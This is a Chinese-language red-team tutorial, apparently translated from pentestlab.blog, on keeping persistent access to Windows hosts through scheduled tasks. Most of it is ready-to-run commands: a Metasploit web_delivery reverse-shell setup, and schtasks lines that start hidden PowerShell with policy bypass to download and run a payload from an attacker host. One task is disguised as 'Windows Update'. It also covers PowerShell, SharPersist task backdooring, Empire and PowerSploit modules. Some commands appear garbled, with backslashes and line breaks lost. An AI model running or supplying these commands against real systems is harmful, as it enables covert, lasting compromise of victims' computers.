通过计划任务实现持续性攻击

  • A+
所属分类:安全文章

Windows操作系统中提供了一个实用工具schtasks.exe,系统管理可以使用该工具完成在指定日期和时间执行程序或脚本的工作。但是目前这个工具经常被黑客或者红队利用,从而实现持续性攻击。普通情况下,通过计划任务实现持续性攻击不需要用到管理员的权限,但是如果你希望能获得更加灵活的操作,例如指定用户登录时或者系统空闲时执行某个任务,还是会需要用到管理员的权限。

通过计划任务完成的持续性攻击既可以手动实现,也可以自动实现。Payload既可以从磁盘上执行,也可以从远程位置下载执行,这些Payload可以是可执行文件、PowerShell脚本或者scriptlets形式。

这种方法已经由来已久,但是却仍然被黑客或者红队所广泛使用,而且现在已经有很多开源工具中也都使用了这个方法。

Metasploit中的“web_delivery”模块可用于管理和生成各种格式的Payload。


use exploit/multi/script/web_deliveryset payload windows/x64/meterpreter/reverse_tcpset LHOST 10.0.2.21set target 5exploit


在命令提示行中使用“schtasks”命令可以创建一个计划任务。


通过计划任务实现持续性攻击


例如使用下面的命令就可以指定在每次系统登录时,操作系统会自动去下载并执行一个基于PowerShell的Payload。


schtasks /create /tn PentestLab /tr "c:windowssyswow64WindowsPowerShellv1.0powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'"/sc onlogon /ru Syste


通过计划任务实现持续性攻击图*-* 命令提示符中实现的计划任务

当系统用户再次登录时,系统将下载执行Payload并建立Meterpreter会话。


通过计划任务实现持续性攻击

图*-* 通过计划任务建立的Meterperter

也可以指定Payload在系统启动期间或系统空闲时执行。


#(X64) - On System Startschtasks /create /tn PentestLab /tr "c:windowssyswow64WindowsPowerShellv1.0powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'"/sc onstart /ru System
#(X64) - On User Idle (30mins)schtasks /create /tn PentestLab /tr "c:windowssyswow64WindowsPowerShellv1.0powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'" /sc onidle /i 30
#(X86) - On User Loginschtasks /create /tn PentestLab /tr "c:windowssystem32WindowsPowerShellv1.0powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'"/sc onlogon /ru System
#(X86) - On System Startschtasks /create /tn PentestLab /tr "c:windowssystem32WindowsPowerShellv1.0powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'" /sc onstart /ru System
#(X86) - On User Idle (30mins)schtasks /create /tn PentestLab /tr "c:windowssystem32WindowsPowerShellv1.0powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'" /sc onidle /i 30


另外我们也可以指定Payload在特定的日期和时间来执行,而且也可以实现Payload的自动删除。


schtasks /CREATE /TN "Windows Update" /TR "c:windowssyswow64WindowsPowerShellv1.0powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://10.0.2.21:8080/ZPWLywg'''))'"/SC minute /MO 1 /ED 04/11/2019 /ET 06:53 /Z /IT /RU %USERNAME%


通过计划任务实现持续性攻击

图*-* 指定日期和时间开展的持续性攻击


如果一个事件(event)开启了事件日志(event logging),那么就可以通过这个事件来触发一个任务(task),b33f在他的网站上展示了这种技术。在Windows中的事件(event)命令行可以查询事件(event)的ID。


通过计划任务实现持续性攻击


我们可以创建一个关联特定事件的计划任务(下载执行某个payload)。


通过计划任务实现持续性攻击

图*-* 持续性攻击-计划任务事件ID


“Query”参数可用于检索新创建的计划任务的信息:schtasks /Query /tn OnLogOff /fo List /v


通过计划任务实现持续性攻击

图*-*  查询调度任务


当目标系统的用户管理员注销时,将创建事件ID,并在下次登录时执行payload。


通过计划任务实现持续性攻击

图*-*  用户管理员注销获取的Meterpreter


我们也可以使用PowerShell创建计划任务,这些任务将在用户登录时或在特定的时间和日期执行。


$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:temppentestlab.exe"$T = New-ScheduledTaskTrigger -AtLogOn -User "pentestlab"$S = New-ScheduledTaskSettingsSet$P = New-ScheduledTaskPrincipal "Pentestlab"$D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $SRegister-ScheduledTask Pentestlab -InputObjec $D

$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:temppentestlab.exe"$T = New-ScheduledTaskTrigger -Daily -At 9am$P = New-ScheduledTaskPrincipal "NT AUTHORITYSYSTEM" -RunLevel Highest$S = New-ScheduledTaskSettingsSet$D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $SRegister-ScheduledTask PentestLaboratories -InputObject $D


通过计划任务实现持续性攻击

图*-* 持续性攻击-PowerShell


SharPersist

https://github.com/fireeye/SharPersist

Brett Hawkins通过计划任务在工具SharPersist中实现多种持续性攻击的方法。如果用户具有管理员级别的权限,就可以使用以下命令来创建一个新的计划任务,该任务将会在系统登录时执行。


SharPersist.exe -t schtask -c "C:WindowsSystem32cmd.exe" -a "/c C:tmppentestlab.exe" -n "PentestLab" -m add -o logon


通过计划任务实现持续性攻击

图*-* SharPersist–新计划任务(登录时触发)


在下一次登录系统时,将执行payload并打开MeterMeter会话。


SharPersist -t schtask -m list -n "PentestLab"


通过计划任务实现持续性攻击

图*-* 使用SharPersist列出的任务信息


或者只使用“list”选项而不指定名称将枚举系统上所有现有的计划任务。

SharPersist -t schtask -m list


通过计划任务实现持续性攻击

图*-* 使用SharPersist列出的计划任务信息


与Metasploit框架功能类似,SharPersist中也具有检查目标是否易受攻击的功能,SharPersist提供了一个运行检查,这个功能可用于通过检查名称和提供的参数来验证计划任务。


SharPersist.exe -t schtask -c "C:WindowsSystem32cmd.exe" -a "/c C:tmppentestlab.exe" -n "PentestLab" -m check


通过计划任务实现持续性攻击

图*-* 使用SharPersist检查任务信息能否执行


SharPersist还可以枚举登录期间将执行的所有计划任务。此命令可在主机的环境调查(situational awareness)期间使用,并确定是否可以修改现有任务而不是新建任务来执行Payload。


SharPersist -t schtaskbackdoor -m list -o logon

通过计划任务实现持续性攻击

图*-* 使用SharPersist列出的登录时计划任务列表


schtaskbackdoor功能和check结合使用,可以识别特定的调度任务是否已存在后门。


SharPersist.exe -t schtaskbackdoor -c "C:WindowsSystem32cmd.exe" -a "/c C:tmppentestlab.exe" -n "PentestLab" -m check

通过计划任务实现持续性攻击

图*-* 使用SharPersist列出的Backdoor 计划任务列表


“Add”参数用来隐藏一个现有的计划任务,该任务将执行恶意命令,而不是执行合法的操作。


SharPersist.exe -t schtaskbackdoor -c "C:WindowsSystem32cmd.exe" -a "/c C:tmppentestlab.exe" -n "ReconcileLanguageResources" -m add

通过计划任务实现持续性攻击

图*-* 使用SharPersist列出的Backdoor 计划任务列表


Empire


Empire中包含两个可以用来实现计划任务的模块(区别在于使用时权限不同),下面给出的命令可以通过PowerShell的userland模块在每天的3:22am执行一个payload。这个payload在注册表中的的任务名称为“WindowsUpdate”,这里要和正常的任务区分开。


usemodule persistence/userland/schtasksset Listener httpset TaskName WindowsUpdateset DailyTime 03:22execute

通过计划任务实现持续性攻击图*-* 使用Empire列出的Backdoor 计划任务列表


PowerShell的elevated模块提供了一个用户登录时执行计划任务的选项。注册表中将这两个模块以Base64编码的格式存储在不同的表项中。


usemodule persistence/elevated/schtasks*set Listener http

通过计划任务实现持续性攻击

图*-* elevated模块


PowerSploit


PowerSploit的持续性攻击模块支持一些可以向脚本或脚本块添加持续性攻击的功能。在使用这个模块时,需要配置Elevated和user选项。


$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -Hourly$UserOptions = New-UserPersistenceOption -ScheduledTask -HourlyAdd-Persistence -FilePath C:tempempire.exe -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions

通过计划任务实现持续性攻击

图*-* PowerSploit – 计划任务列表


from:https://pentestlab.blog/tag/powersploit


想看更多国际顶级技术文章的读者可以加入我们"Kali Linux2020 渗透测试指南"知识星球,我们会提供超过20篇最新国外的技术文章的原创翻译文章和视频讲解!


当前很多培训机构和安全公众号在技术上炒冷饭,我们希望能够和大家分享国内外研究热点的论文和最新技术文章,主要是外文文献为准,目的是帮助大家更深层次的去了解到当前世界上安全领域最新的研究方向,以及国内外这些网络安全专家他们研究问题的思路和方法!

 

星球主讲人:

李华峰,信息安全顾问和自由撰稿人,多年来一直从事网络安全渗透测试方面的研究工作。在网络安全部署、网络攻击与防御以及社会工程学等方面有十分丰富的实践经验。已出版的著作和译著包括:《精通Metasploit渗透测试(第2版)》《诸神之眼—Nmap网络安全审计技术揭秘》《Python渗透测试编程-技术方法与实践2》《Wireshark网络分析从入门到实践》《Kali Linux 2网络渗透测试实践指南 2》等。

 


扫描下方二维码加入星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

通过计划任务实现持续性攻击






扫描下方二维码加入星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

通过计划任务实现持续性攻击 通过计划任务实现持续性攻击

通过计划任务实现持续性攻击 通过计划任务实现持续性攻击 通过计划任务实现持续性攻击

目前30000+人已关注加入我们

通过计划任务实现持续性攻击




目前30000+人已关注加入我们

通过计划任务实现持续性攻击

本文始发于微信公众号(Ms08067安全实验室):通过计划任务实现持续性攻击

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: